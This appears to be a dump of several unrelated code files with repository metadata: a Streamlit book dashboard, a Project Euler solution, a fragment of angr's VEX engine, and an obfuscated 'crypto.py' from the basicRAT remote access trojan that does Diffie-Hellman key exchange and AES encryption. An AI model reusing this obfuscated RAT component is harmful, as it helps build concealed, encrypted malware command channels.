# TOP 5 AUTHORS AND BOTTOM 5 AUTHORS
author_info = books.groupby(["bookAuthor"]).size().reset_index(name='count')
author_info.columns = ['Author','Count']
author_info = author_info.sort_values("Count", ascending=False)
top_5_authors = author_info.head(5)
bottom_5_authors = author_info.tail(5)
# NUMBER OF BOOKS BY YEAR
book_year_info = books.groupby(["yearOfPublication"]).size().reset_index(name='count')
book_year_info.columns = ['Year','Count']
book_year_info = book_year_info.sort_values("Year", ascending=False)
# TOP AND BOTTOM 5 COUNTRIES
country_info = users.groupby(["Country"]).size().reset_index(name='count')
country_info.columns = ['Country','Count']
country_info = country_info.sort_values("Count", ascending=False)
top_5_countries = country_info.head(5)
bottom_5_countries = country_info.tail(5)
# Metrics
metric1_column, metric2_column,metric3_column,metric4_column = st.columns(4)
metric1_column.metric("Avg. Rating", average_rating)
metric2_column.metric("# of Users", number_of_users)
metric3_column.metric("# of Books", number_of_books)
metric4_column.metric("Avg. Age", average_age)
# Publisher
st.subheader("Top and Bottom 5 Publishers")
st.write("Top 5 Publishers")
output = px.bar(top_5_publishers, x="Publisher", y="Count")
st.plotly_chart(output)
st.write("Bottom 5 Publishers")
output = px.bar(bottom_5_publishers, x="Publisher", y="Count")
st.plotly_chart(output)
# Author
st.subheader("Top and Bottom 5 Authors")
st.write("Top 5 Authors")
output = px.bar(top_5_authors, x="Author", y="Count")
st.plotly_chart(output)
st.write("Bottom 5 Authors")
output = px.bar(bottom_5_authors, x="Author", y="Count")
st.plotly_chart(output)
# Country
st.subheader("Top and Bottom 5 Countries")
st.write("Top 5 Countries")
output = px.bar(top_5_countries, x="Country", y="Count")
st.plotly_chart(output)
st.write("Bottom 5 Countries")
output = px.bar(bottom_5_countries, x="Country", y="Count")
st.plotly_chart(output)
# books by year
st.subheader("Books by Year Trend")
output = px.line(book_year_info, x="Year", y="Count")
st.plotly_chart(output)
| [
"[email protected]"
] | |
bb0b96e5d3a9763e899440f021b68306c0ff6345 | 022a0cb0d0873da0c25da6b6aa8b258b80a4b7e0 | /165.py | 933086226d00282a90482d8c4273a8718bea1615 | [] | no_license | subayadhav/fri07061 | 31e1e89ac1be60c736450f749486651968cfeba4 | 380f5d108869ad4cde16140dc21a88f2a7972722 | refs/heads/master | 2020-06-01T06:43:17.094510 | 2019-06-07T08:47:49 | 2019-06-07T08:47:49 | 190,683,539 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 130 | py | n1,k=map(int,input().split())
l=[int(x) for x in input().split()]
l.sort()
for i in l:
if i>k:
print(i)
break
| [
"[email protected]"
] | |
fc6e66e86ac585463ab601ee7c6f9640e45dda1d | 66940384fbc655f8e173d8f6b05c01494f6b7b8e | /intensio/test/python/advanced/output/basicRAT/core/crypto.py | 7e1ef673b97e2fe1c9bef3e28fe30d76d84d9c92 | [
"MIT",
"Unlicense"
] | permissive | a7t0fwa7/Intensio-Obfuscator | 15ab89a6593e0a22ee7f34a90174fe1f89442722 | bc86392c3f19a2c8fd87e926d285c5b249cb5de6 | refs/heads/master | 2022-01-24T01:04:53.199138 | 2019-06-16T08:49:27 | 2019-06-16T08:49:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,298 | py | # -*- coding: utf-8 -*-
import os
from Crypto import Random
from Crypto.Cipher import AES
from Crypto.Hash import SHA256
from common import wWtKmzLluyGJQdDKJuhxDRVbBkKUuxrBjlkmMbEpRDNMHvFKVoClMZaiofwOBNMkliYNwCOoxwPDlEWsjfqccRzMMfLIzAZTKQCzzfwHiIvBDKnaeeNarleUiQRJVWjT, OoUSTzYrmbsTlbduPEWrYyVFuKVoKRljNvnbOjqTIgSdocbQScmInoalUrDdCGzSAUtEMlyUiiPDIfUrDGHpipJHNDMIZMJxZrDHNobyrEMDhdSfWLrpnTiVLoRYJsvh
bKkoWEPoGHkOdCuDbjRHTgCCPekyeENZbTssJexqZEUygHLhQNFExxUjzRtULnGEYSnbqtkNUKmHnDcHfXJvocITDEcamtGZQfPRRwDCUcnzIfnoDfGVVJkHGHtgwhNC = 'b14ce95fa4c33ac2803782d18341869f'
class EAdXIuFoUGZAVpoCdvIEeqyMfkZRAtGhRCdcUGanSOUqndHlCVMyurPpBENHfhjGLkFDAUUrIraObXfxkUSFdjrmbRFeJXtMINFJltXdDWTwfsirIyQDGRNBzMzzvfWL(Exception):
pass
def gEldrYdtgILwZMCzKXnshgTsysMFuzlcoMlTWRtHgLCOdhqCcafsfUfdWehMrjGrSRhOpKCFlZtiNjeDCGmCPEFNvRgmNhCiFxRbmSUUIhZIUqjSGhdJaRxYFIECjOcH(IMDyoarXIvJTJdWJCGOFHRGoYpyZOQwMQswXgCqqBYZPwHmEKWHFgWvSTOWflvFAvItvdYVDBYxOTEcVQJMpmSLVlLEeHFdwjSDhVtFcIpGmGyKHqEoogvSnIVeJcmTb, IPaqVWdkIVTvfiDLmdrJfQiTJwegaBlDpVDqohKftHhsOOePvQsmThqrMFRmaWzudOgIwwDCzubKrVsrsPkJzkiLLOwFWZWQjEXHmYWWqJmsQBCiHHCnYAjgfqvSlGSJ=AES.block_size):
FwHRyNZozIMXdyiZJsHankgCFFzlmlBwAqYTfncWWtBopgSMloKceEAEEmOuaRJChsmKsmaKCQvxFiNLfBSYpsfksAjVXqjBTJUAOwQvWvTmOHgUPqmqyxxOzGojyCmi = (IPaqVWdkIVTvfiDLmdrJfQiTJwegaBlDpVDqohKftHhsOOePvQsmThqrMFRmaWzudOgIwwDCzubKrVsrsPkJzkiLLOwFWZWQjEXHmYWWqJmsQBCiHHCnYAjgfqvSlGSJ - (len(IMDyoarXIvJTJdWJCGOFHRGoYpyZOQwMQswXgCqqBYZPwHmEKWHFgWvSTOWflvFAvItvdYVDBYxOTEcVQJMpmSLVlLEeHFdwjSDhVtFcIpGmGyKHqEoogvSnIVeJcmTb) % IPaqVWdkIVTvfiDLmdrJfQiTJwegaBlDpVDqohKftHhsOOePvQsmThqrMFRmaWzudOgIwwDCzubKrVsrsPkJzkiLLOwFWZWQjEXHmYWWqJmsQBCiHHCnYAjgfqvSlGSJ))
return IMDyoarXIvJTJdWJCGOFHRGoYpyZOQwMQswXgCqqBYZPwHmEKWHFgWvSTOWflvFAvItvdYVDBYxOTEcVQJMpmSLVlLEeHFdwjSDhVtFcIpGmGyKHqEoogvSnIVeJcmTb + (chr(FwHRyNZozIMXdyiZJsHankgCFFzlmlBwAqYTfncWWtBopgSMloKceEAEEmOuaRJChsmKsmaKCQvxFiNLfBSYpsfksAjVXqjBTJUAOwQvWvTmOHgUPqmqyxxOzGojyCmi)*FwHRyNZozIMXdyiZJsHankgCFFzlmlBwAqYTfncWWtBopgSMloKceEAEEmOuaRJChsmKsmaKCQvxFiNLfBSYpsfksAjVXqjBTJUAOwQvWvTmOHgUPqmqyxxOzGojyCmi)
def QjHzhUCTrwVefddXugONOhThvXziTmlfyjZrYxyadqwmwAuyxIlIWyNbHcUpjUaeHVChIDTpNzDYHXHyXYhzjzdjSgttsMmVzcnfqObmLfjpiVrDNUCtuKhPvaThRSLT(IMDyoarXIvJTJdWJCGOFHRGoYpyZOQwMQswXgCqqBYZPwHmEKWHFgWvSTOWflvFAvItvdYVDBYxOTEcVQJMpmSLVlLEeHFdwjSDhVtFcIpGmGyKHqEoogvSnIVeJcmTb):
FwHRyNZozIMXdyiZJsHankgCFFzlmlBwAqYTfncWWtBopgSMloKceEAEEmOuaRJChsmKsmaKCQvxFiNLfBSYpsfksAjVXqjBTJUAOwQvWvTmOHgUPqmqyxxOzGojyCmi = IMDyoarXIvJTJdWJCGOFHRGoYpyZOQwMQswXgCqqBYZPwHmEKWHFgWvSTOWflvFAvItvdYVDBYxOTEcVQJMpmSLVlLEeHFdwjSDhVtFcIpGmGyKHqEoogvSnIVeJcmTb[-1]
if IMDyoarXIvJTJdWJCGOFHRGoYpyZOQwMQswXgCqqBYZPwHmEKWHFgWvSTOWflvFAvItvdYVDBYxOTEcVQJMpmSLVlLEeHFdwjSDhVtFcIpGmGyKHqEoogvSnIVeJcmTb.endswith(FwHRyNZozIMXdyiZJsHankgCFFzlmlBwAqYTfncWWtBopgSMloKceEAEEmOuaRJChsmKsmaKCQvxFiNLfBSYpsfksAjVXqjBTJUAOwQvWvTmOHgUPqmqyxxOzGojyCmi*ord(FwHRyNZozIMXdyiZJsHankgCFFzlmlBwAqYTfncWWtBopgSMloKceEAEEmOuaRJChsmKsmaKCQvxFiNLfBSYpsfksAjVXqjBTJUAOwQvWvTmOHgUPqmqyxxOzGojyCmi)):
return IMDyoarXIvJTJdWJCGOFHRGoYpyZOQwMQswXgCqqBYZPwHmEKWHFgWvSTOWflvFAvItvdYVDBYxOTEcVQJMpmSLVlLEeHFdwjSDhVtFcIpGmGyKHqEoogvSnIVeJcmTb[:-ord(FwHRyNZozIMXdyiZJsHankgCFFzlmlBwAqYTfncWWtBopgSMloKceEAEEmOuaRJChsmKsmaKCQvxFiNLfBSYpsfksAjVXqjBTJUAOwQvWvTmOHgUPqmqyxxOzGojyCmi)]
raise EAdXIuFoUGZAVpoCdvIEeqyMfkZRAtGhRCdcUGanSOUqndHlCVMyurPpBENHfhjGLkFDAUUrIraObXfxkUSFdjrmbRFeJXtMINFJltXdDWTwfsirIyQDGRNBzMzzvfWL("PKCS7 improper padding {}".format(repr(IMDyoarXIvJTJdWJCGOFHRGoYpyZOQwMQswXgCqqBYZPwHmEKWHFgWvSTOWflvFAvItvdYVDBYxOTEcVQJMpmSLVlLEeHFdwjSDhVtFcIpGmGyKHqEoogvSnIVeJcmTb[-32:])))
def QEuFRUGHmmUbsvbUVasrWrQhxiSXYrFkyajmxvyynxaznvtWMoioEgFDdRaSLMbuYzItmBnItyFshzmvtSRgiQHDPMyGaDupFmxxVuhmqWZaOEmAoAzIcmbEAKJiDHLT(sock, oSdNVlnenTDFzAfFSqUcqnfHRKHnFdxlORnUvNBQGifCilXmgQnMAEgTZhzBNgkVXCQogdMmXpkgKTqRCqJLQWMEymEnxGkPlhZSkjYaGJbgPoKWnFKSAvpEPhTuBUYF=True, bits=2048):
gHhWmUaToMTVPuLkTzZBiWKYnZGdFshkAhhQbzeEpsgVCtnEyCBfxWNXBdDfDOlIqpoXJLfxkNQQxgWrtWOWXkyBrgRMBnkQXARhtzeDlSEgXWnreULTtzLOeDjCARZA = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF;
lzwDXxlVdllygWgkWWzrzQAohkjehIDHCcuOLrVoCjQcdBirmqVsHochnlurqrBocxodNUcNDyFTEItimbHXDtEYGbLauxhPQUfGVtvjSVPJYKlaaeJZCLiqGOqNTLDx = 2
dcqwDxyKfGLRYrNbxalVWtalhDWTwnDqMFBzeKinEPrZcdVKuOrVKkjbwkIOakfseiRmhoRcAgajomIRatVETfRLikeKBOhnFcJZjzOwdPIeOpBkSDsGsSTcxjoFbJGf = OoUSTzYrmbsTlbduPEWrYyVFuKVoKRljNvnbOjqTIgSdocbQScmInoalUrDdCGzSAUtEMlyUiiPDIfUrDGHpipJHNDMIZMJxZrDHNobyrEMDhdSfWLrpnTiVLoRYJsvh(os.urandom(32))
OyGHFspVyMJhhtkOZiMSiKLAWfYOGjjYhfZcREsgEGCoRhdNwyiIJIJOfjMeoZkFJiPitnmTwMvsUCZpHLZJsfLLpbSfDYZMjqhdxyGSQxiEmSYomHyepLDoxakqrYMJ = pow(lzwDXxlVdllygWgkWWzrzQAohkjehIDHCcuOLrVoCjQcdBirmqVsHochnlurqrBocxodNUcNDyFTEItimbHXDtEYGbLauxhPQUfGVtvjSVPJYKlaaeJZCLiqGOqNTLDx, dcqwDxyKfGLRYrNbxalVWtalhDWTwnDqMFBzeKinEPrZcdVKuOrVKkjbwkIOakfseiRmhoRcAgajomIRatVETfRLikeKBOhnFcJZjzOwdPIeOpBkSDsGsSTcxjoFbJGf, gHhWmUaToMTVPuLkTzZBiWKYnZGdFshkAhhQbzeEpsgVCtnEyCBfxWNXBdDfDOlIqpoXJLfxkNQQxgWrtWOWXkyBrgRMBnkQXARhtzeDlSEgXWnreULTtzLOeDjCARZA)
if oSdNVlnenTDFzAfFSqUcqnfHRKHnFdxlORnUvNBQGifCilXmgQnMAEgTZhzBNgkVXCQogdMmXpkgKTqRCqJLQWMEymEnxGkPlhZSkjYaGJbgPoKWnFKSAvpEPhTuBUYF:
sock.send(wWtKmzLluyGJQdDKJuhxDRVbBkKUuxrBjlkmMbEpRDNMHvFKVoClMZaiofwOBNMkliYNwCOoxwPDlEWsjfqccRzMMfLIzAZTKQCzzfwHiIvBDKnaeeNarleUiQRJVWjT(OyGHFspVyMJhhtkOZiMSiKLAWfYOGjjYhfZcREsgEGCoRhdNwyiIJIJOfjMeoZkFJiPitnmTwMvsUCZpHLZJsfLLpbSfDYZMjqhdxyGSQxiEmSYomHyepLDoxakqrYMJ))
IrRkNnGENquaebwxcAEgPJOtGSRWDXOyNtPviVrZfYoUyliLUSJNvZYtfePSlkCerIjHVxijrFHFtUWjDrhzDtraytOJIbVsXBCjrEWSLkcezCmsFlsUQflodwclSGUM = OoUSTzYrmbsTlbduPEWrYyVFuKVoKRljNvnbOjqTIgSdocbQScmInoalUrDdCGzSAUtEMlyUiiPDIfUrDGHpipJHNDMIZMJxZrDHNobyrEMDhdSfWLrpnTiVLoRYJsvh(sock.recv(4096))
else:
IrRkNnGENquaebwxcAEgPJOtGSRWDXOyNtPviVrZfYoUyliLUSJNvZYtfePSlkCerIjHVxijrFHFtUWjDrhzDtraytOJIbVsXBCjrEWSLkcezCmsFlsUQflodwclSGUM = OoUSTzYrmbsTlbduPEWrYyVFuKVoKRljNvnbOjqTIgSdocbQScmInoalUrDdCGzSAUtEMlyUiiPDIfUrDGHpipJHNDMIZMJxZrDHNobyrEMDhdSfWLrpnTiVLoRYJsvh(sock.recv(4096))
sock.send(wWtKmzLluyGJQdDKJuhxDRVbBkKUuxrBjlkmMbEpRDNMHvFKVoClMZaiofwOBNMkliYNwCOoxwPDlEWsjfqccRzMMfLIzAZTKQCzzfwHiIvBDKnaeeNarleUiQRJVWjT(OyGHFspVyMJhhtkOZiMSiKLAWfYOGjjYhfZcREsgEGCoRhdNwyiIJIJOfjMeoZkFJiPitnmTwMvsUCZpHLZJsfLLpbSfDYZMjqhdxyGSQxiEmSYomHyepLDoxakqrYMJ))
IMDyoarXIvJTJdWJCGOFHRGoYpyZOQwMQswXgCqqBYZPwHmEKWHFgWvSTOWflvFAvItvdYVDBYxOTEcVQJMpmSLVlLEeHFdwjSDhVtFcIpGmGyKHqEoogvSnIVeJcmTb = pow(IrRkNnGENquaebwxcAEgPJOtGSRWDXOyNtPviVrZfYoUyliLUSJNvZYtfePSlkCerIjHVxijrFHFtUWjDrhzDtraytOJIbVsXBCjrEWSLkcezCmsFlsUQflodwclSGUM, dcqwDxyKfGLRYrNbxalVWtalhDWTwnDqMFBzeKinEPrZcdVKuOrVKkjbwkIOakfseiRmhoRcAgajomIRatVETfRLikeKBOhnFcJZjzOwdPIeOpBkSDsGsSTcxjoFbJGf, gHhWmUaToMTVPuLkTzZBiWKYnZGdFshkAhhQbzeEpsgVCtnEyCBfxWNXBdDfDOlIqpoXJLfxkNQQxgWrtWOWXkyBrgRMBnkQXARhtzeDlSEgXWnreULTtzLOeDjCARZA)
return SHA256.new(wWtKmzLluyGJQdDKJuhxDRVbBkKUuxrBjlkmMbEpRDNMHvFKVoClMZaiofwOBNMkliYNwCOoxwPDlEWsjfqccRzMMfLIzAZTKQCzzfwHiIvBDKnaeeNarleUiQRJVWjT(IMDyoarXIvJTJdWJCGOFHRGoYpyZOQwMQswXgCqqBYZPwHmEKWHFgWvSTOWflvFAvItvdYVDBYxOTEcVQJMpmSLVlLEeHFdwjSDhVtFcIpGmGyKHqEoogvSnIVeJcmTb)).digest()
def AHnNuwPNvaLtDXnDNSbnjztjWOKZyrgTQLxVasvZVdPxLoZNXnfWxgdBmcQkhkqdZRbupkhHvBxyffIgbSWYcvxiqXaHHnuOdzVmbMZYzZzwIBsGoHTsdVQjxxUrxChY(bgdLsmrPZGElnfPEgYqlCDvjCwbQrbYAxuEitvUuoDsWynocpzQdgPEIYkItfVxDonOafKMdFRvPesnIRQfrKTJiLlReHBJtsOCCJnZUCltCOUhGNZWxEpUgzPteEztr, KEY):
bgdLsmrPZGElnfPEgYqlCDvjCwbQrbYAxuEitvUuoDsWynocpzQdgPEIYkItfVxDonOafKMdFRvPesnIRQfrKTJiLlReHBJtsOCCJnZUCltCOUhGNZWxEpUgzPteEztr = gEldrYdtgILwZMCzKXnshgTsysMFuzlcoMlTWRtHgLCOdhqCcafsfUfdWehMrjGrSRhOpKCFlZtiNjeDCGmCPEFNvRgmNhCiFxRbmSUUIhZIUqjSGhdJaRxYFIECjOcH(bgdLsmrPZGElnfPEgYqlCDvjCwbQrbYAxuEitvUuoDsWynocpzQdgPEIYkItfVxDonOafKMdFRvPesnIRQfrKTJiLlReHBJtsOCCJnZUCltCOUhGNZWxEpUgzPteEztr)
kFDMmqsVkPXClQsgNBDAMGyydNsTUCHCcIhLRFmHJNWSacEaQjQPlMUJaIlNlXcBFprHlowDNbxycEoZzaiBTOJIXxMxmSUEjPeRyJqYfpAiPGKuzjGQUbCffGOhAfLF = Random.new().read(AES.block_size)
twZydEKxUQvQzsikGhVTyDbBhIGctQopEZqEdTRUxqVcZrxgRlZqZcbjTVSRRqodFKmDwsWcTytexLOewBTShWNBpmSMoZmRWriYPhhfuRLxXjzpXFpmqrbktpNJCWlo = AES.new(KEY, AES.MODE_CBC, kFDMmqsVkPXClQsgNBDAMGyydNsTUCHCcIhLRFmHJNWSacEaQjQPlMUJaIlNlXcBFprHlowDNbxycEoZzaiBTOJIXxMxmSUEjPeRyJqYfpAiPGKuzjGQUbCffGOhAfLF)
return kFDMmqsVkPXClQsgNBDAMGyydNsTUCHCcIhLRFmHJNWSacEaQjQPlMUJaIlNlXcBFprHlowDNbxycEoZzaiBTOJIXxMxmSUEjPeRyJqYfpAiPGKuzjGQUbCffGOhAfLF + twZydEKxUQvQzsikGhVTyDbBhIGctQopEZqEdTRUxqVcZrxgRlZqZcbjTVSRRqodFKmDwsWcTytexLOewBTShWNBpmSMoZmRWriYPhhfuRLxXjzpXFpmqrbktpNJCWlo.encrypt(bgdLsmrPZGElnfPEgYqlCDvjCwbQrbYAxuEitvUuoDsWynocpzQdgPEIYkItfVxDonOafKMdFRvPesnIRQfrKTJiLlReHBJtsOCCJnZUCltCOUhGNZWxEpUgzPteEztr)
def eAWDPoJlBkIQLeOybYBQJTCJhVbTyejYBOUUrlAZoOKfFnmRZhgAYGzZdgNhHkmNAJuDsYgmtGjkyYmrBpMzzdLAiHUMIKtnMGiqObhoTidXoErVIkWHhYAckpMknpws(ciphertext, KEY):
kFDMmqsVkPXClQsgNBDAMGyydNsTUCHCcIhLRFmHJNWSacEaQjQPlMUJaIlNlXcBFprHlowDNbxycEoZzaiBTOJIXxMxmSUEjPeRyJqYfpAiPGKuzjGQUbCffGOhAfLF = ciphertext[:AES.block_size]
twZydEKxUQvQzsikGhVTyDbBhIGctQopEZqEdTRUxqVcZrxgRlZqZcbjTVSRRqodFKmDwsWcTytexLOewBTShWNBpmSMoZmRWriYPhhfuRLxXjzpXFpmqrbktpNJCWlo = AES.new(KEY, AES.MODE_CBC, kFDMmqsVkPXClQsgNBDAMGyydNsTUCHCcIhLRFmHJNWSacEaQjQPlMUJaIlNlXcBFprHlowDNbxycEoZzaiBTOJIXxMxmSUEjPeRyJqYfpAiPGKuzjGQUbCffGOhAfLF)
bgdLsmrPZGElnfPEgYqlCDvjCwbQrbYAxuEitvUuoDsWynocpzQdgPEIYkItfVxDonOafKMdFRvPesnIRQfrKTJiLlReHBJtsOCCJnZUCltCOUhGNZWxEpUgzPteEztr = twZydEKxUQvQzsikGhVTyDbBhIGctQopEZqEdTRUxqVcZrxgRlZqZcbjTVSRRqodFKmDwsWcTytexLOewBTShWNBpmSMoZmRWriYPhhfuRLxXjzpXFpmqrbktpNJCWlo.decrypt(ciphertext[AES.block_size:])
return QjHzhUCTrwVefddXugONOhThvXziTmlfyjZrYxyadqwmwAuyxIlIWyNbHcUpjUaeHVChIDTpNzDYHXHyXYhzjzdjSgttsMmVzcnfqObmLfjpiVrDNUCtuKhPvaThRSLT(bgdLsmrPZGElnfPEgYqlCDvjCwbQrbYAxuEitvUuoDsWynocpzQdgPEIYkItfVxDonOafKMdFRvPesnIRQfrKTJiLlReHBJtsOCCJnZUCltCOUhGNZWxEpUgzPteEztr)
| [
"[email protected]"
] | |
eb505b88bac2629ad98d57305ff289ab7e507c38 | 94d1e805521575afb7b6256af1dd6de65a50ada9 | /problem_5/problem_5.py | 458d419fed34ea5f74c68c10e9d6c3fe6dc7dbf6 | [] | no_license | John-W-Stevens/Euler100 | fe2004786f64172e02ba18fbe33d95ceb68abf59 | 6f193a47e9e019b99ee9b188d2227587f5a3f4b3 | refs/heads/master | 2022-11-26T07:23:36.505138 | 2020-07-28T17:36:39 | 2020-07-28T17:36:39 | 274,224,709 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,828 | py | # 2520 is the smallest number that can be divided by each of the numbers from 1 to 10 without any remainder.
# What is the smallest positive number that is evenly divisible by all of the numbers from 1 to 20?
import time
def is_prime(n):
""" Returns Boolean """
if n <= 1: return False
if n == 2 or n == 3: return True
if n % 2 == 0 or n % 3 == 0: return False
i, w, = 5, 2
while i * i <= n:
if n % i == 0:
return False
i += w
w = 6 - w
return True
def prime_factorization(n):
"""
Assumes n >= 2
Returns a dict mapping the prime factors of n and their respective powers
"""
if is_prime(n):
return {n: 1}
    prime_factors = {2: 0, 3: 0}
    while n % 2 == 0:
        prime_factors[2] += 1
        n //= 2
    while n % 3 == 0:
        prime_factors[3] += 1
        n //= 3
    for i in range(5, int(n**0.5) + 1, 2):
        if not is_prime(i):
            continue
        while n % i == 0:
            prime_factors[i] = prime_factors.get(i, 0) + 1
            n //= i
    # a prime cofactor larger than the loop bound can survive the divisions
    # (e.g. n=20 leaves 5 behind); record it or the factorization is incomplete
    if n > 1:
        prime_factors[n] = prime_factors.get(n, 0) + 1
    return prime_factors
def problem_5(n):
""" Returns the smallest number divisible by every number <= n """
output = 1
prime_factor_map = {}
for i in range(2, n+1):
prime_factors = prime_factorization(i)
for p,e in prime_factors.items():
try:
if prime_factor_map[p] < e:
prime_factor_map[p] = e
except KeyError:
prime_factor_map[p] = e
for p,e in prime_factor_map.items():
output *= pow(p,e)
return output
start = time.time()
solution = problem_5(20)
print(f"{solution} found in {time.time() - start} seconds.")
# 232792560 found in 3.1948089599609375e-05 seconds.
| [
"[email protected]"
] | |
050f658bbc509a570071f2ce3a366845a2d65a4a | 33af6185b48bd76f97f0a74390a3a812ee216c78 | /angr/angr/engines/vex/engine.py | 99886567ccb324c7a43534a230d455d3977bf526 | [
"BSD-2-Clause"
] | permissive | Ruide/angr-dev | dab0cabd907fce47ac698f890c3f3a8b80ab7e2a | 964dc80c758e25c698c2cbcc454ef5954c5fa0a0 | refs/heads/master | 2022-11-10T11:27:13.355024 | 2017-10-07T14:29:09 | 2017-10-07T14:29:09 | 104,417,044 | 0 | 1 | BSD-2-Clause | 2022-10-16T04:48:10 | 2017-09-22T01:35:12 | C | UTF-8 | Python | false | false | 24,603 | py | import sys
from cachetools import LRUCache
import pyvex
import claripy
from archinfo import ArchARM
from ... import sim_options as o
from ...state_plugins.inspect import BP_AFTER, BP_BEFORE
from ...state_plugins.sim_action import SimActionExit, SimActionObject
from ...errors import (SimError, SimIRSBError, SimSolverError, SimMemoryAddressError, SimReliftException,
UnsupportedDirtyError, SimTranslationError, SimEngineError, SimSegfaultError,
SimMemoryError)
from ..engine import SimEngine
from .statements import translate_stmt
from .expressions import translate_expr
import logging
l = logging.getLogger("angr.engines.vex.engine")
#pylint: disable=arguments-differ
VEX_IRSB_MAX_SIZE = 400
VEX_IRSB_MAX_INST = 99
class SimEngineVEX(SimEngine):
"""
Execution engine based on VEX, Valgrind's IR.
"""
def __init__(self, stop_points=None,
use_cache=True,
cache_size=10000,
default_opt_level=1,
support_selfmodifying_code=False,
single_step=False):
super(SimEngineVEX, self).__init__()
self._stop_points = stop_points
self._use_cache = use_cache
self._default_opt_level = default_opt_level
self._support_selfmodifying_code = support_selfmodifying_code
self._single_step = single_step
self._cache_size = cache_size
self._block_cache = None
self._cache_hit_count = 0
self._cache_miss_count = 0
self._initialize_block_cache()
def _initialize_block_cache(self):
self._block_cache = LRUCache(maxsize=self._cache_size)
self._cache_hit_count = 0
self._cache_miss_count = 0
def process(self, state,
irsb=None,
skip_stmts=0,
last_stmt=99999999,
whitelist=None,
inline=False,
force_addr=None,
insn_bytes=None,
size=None,
num_inst=None,
traceflags=0,
thumb=False,
opt_level=None,
**kwargs):
"""
:param state: The state with which to execute
:param irsb: The PyVEX IRSB object to use for execution. If not provided one will be lifted.
:param skip_stmts: The number of statements to skip in processing
:param last_stmt: Do not execute any statements after this statement
:param whitelist: Only execute statements in this set
:param inline: This is an inline execution. Do not bother copying the state.
:param force_addr: Force execution to pretend that we're working at this concrete address
:param thumb: Whether the block should be lifted in ARM's THUMB mode.
:param opt_level: The VEX optimization level to use.
:param insn_bytes: A string of bytes to use for the block instead of the project.
:param size: The maximum size of the block, in bytes.
:param num_inst: The maximum number of instructions.
:param traceflags: traceflags to be passed to VEX. (default: 0)
:returns: A SimSuccessors object categorizing the block's successors
"""
return super(SimEngineVEX, self).process(state, irsb,
skip_stmts=skip_stmts,
last_stmt=last_stmt,
whitelist=whitelist,
inline=inline,
force_addr=force_addr,
insn_bytes=insn_bytes,
size=size,
num_inst=num_inst,
traceflags=traceflags,
thumb=thumb,
opt_level=opt_level)
def _check(self, state, *args, **kwargs):
return True
def _process(self, state, successors, irsb=None, skip_stmts=0, last_stmt=99999999, whitelist=None, insn_bytes=None, size=None, num_inst=None, traceflags=0, thumb=False, opt_level=None):
successors.sort = 'IRSB'
successors.description = 'IRSB'
state.history.recent_block_count = 1
state.scratch.guard = claripy.true
state.scratch.sim_procedure = None
addr = successors.addr
state._inspect('irsb', BP_BEFORE, address=addr)
while True:
if irsb is None:
irsb = self.lift(
addr=addr,
state=state,
insn_bytes=insn_bytes,
size=size,
num_inst=num_inst,
traceflags=traceflags,
thumb=thumb,
opt_level=opt_level)
if irsb.size == 0:
raise SimIRSBError("Empty IRSB passed to SimIRSB.")
# check permissions, are we allowed to execute here? Do we care?
if o.STRICT_PAGE_ACCESS in state.options:
try:
perms = state.memory.permissions(addr)
except (KeyError, SimMemoryError): # TODO: can this still raise KeyError?
raise SimSegfaultError(addr, 'exec-miss')
else:
if not perms.symbolic:
perms = state.se.eval(perms)
if not perms & 4 and o.ENABLE_NX in state.options:
raise SimSegfaultError(addr, 'non-executable')
state.scratch.tyenv = irsb.tyenv
state.scratch.irsb = irsb
try:
self._handle_irsb(state, successors, irsb, skip_stmts, last_stmt, whitelist)
except SimReliftException as e:
state = e.state
if insn_bytes is not None:
raise SimEngineError("You cannot pass self-modifying code as insn_bytes!!!")
new_ip = state.scratch.ins_addr
if size is not None:
size -= new_ip - addr
if num_inst is not None:
num_inst -= state.scratch.num_insns
addr = new_ip
# clear the stage before creating the new IRSB
state.scratch.dirty_addrs.clear()
irsb = None
except SimError as ex:
ex.record_state(state)
raise
else:
break
state._inspect('irsb', BP_AFTER)
successors.processed = True
def _handle_irsb(self, state, successors, irsb, skip_stmts, last_stmt, whitelist):
# shortcut. we'll be typing this a lot
ss = irsb.statements
num_stmts = len(ss)
# fill in artifacts
successors.artifacts['irsb'] = irsb
successors.artifacts['irsb_size'] = irsb.size
successors.artifacts['irsb_direct_next'] = irsb.direct_next
successors.artifacts['irsb_default_jumpkind'] = irsb.jumpkind
insn_addrs = [ ]
# if we've told the block to truncate before it ends, it will definitely have a default
# exit barring errors
has_default_exit = num_stmts <= last_stmt
# This option makes us only execute the last four instructions
if o.SUPER_FASTPATH in state.options:
imark_counter = 0
for i in xrange(len(ss) - 1, -1, -1):
if type(ss[i]) is pyvex.IRStmt.IMark:
imark_counter += 1
if imark_counter >= 4:
skip_stmts = max(skip_stmts, i)
break
for stmt_idx, stmt in enumerate(ss):
if isinstance(stmt, pyvex.IRStmt.IMark):
insn_addrs.append(stmt.addr + stmt.delta)
if stmt_idx < skip_stmts:
l.debug("Skipping statement %d", stmt_idx)
continue
if last_stmt is not None and stmt_idx > last_stmt:
l.debug("Truncating statement %d", stmt_idx)
continue
if whitelist is not None and stmt_idx not in whitelist:
l.debug("Blacklisting statement %d", stmt_idx)
continue
try:
state.scratch.stmt_idx = stmt_idx
state._inspect('statement', BP_BEFORE, statement=stmt_idx)
self._handle_statement(state, successors, stmt)
state._inspect('statement', BP_AFTER)
except UnsupportedDirtyError:
if o.BYPASS_UNSUPPORTED_IRDIRTY not in state.options:
raise
if stmt.tmp not in (0xffffffff, -1):
retval_size = state.scratch.tyenv.sizeof(stmt.tmp)
retval = state.se.Unconstrained("unsupported_dirty_%s" % stmt.cee.name, retval_size)
state.scratch.store_tmp(stmt.tmp, retval, None, None)
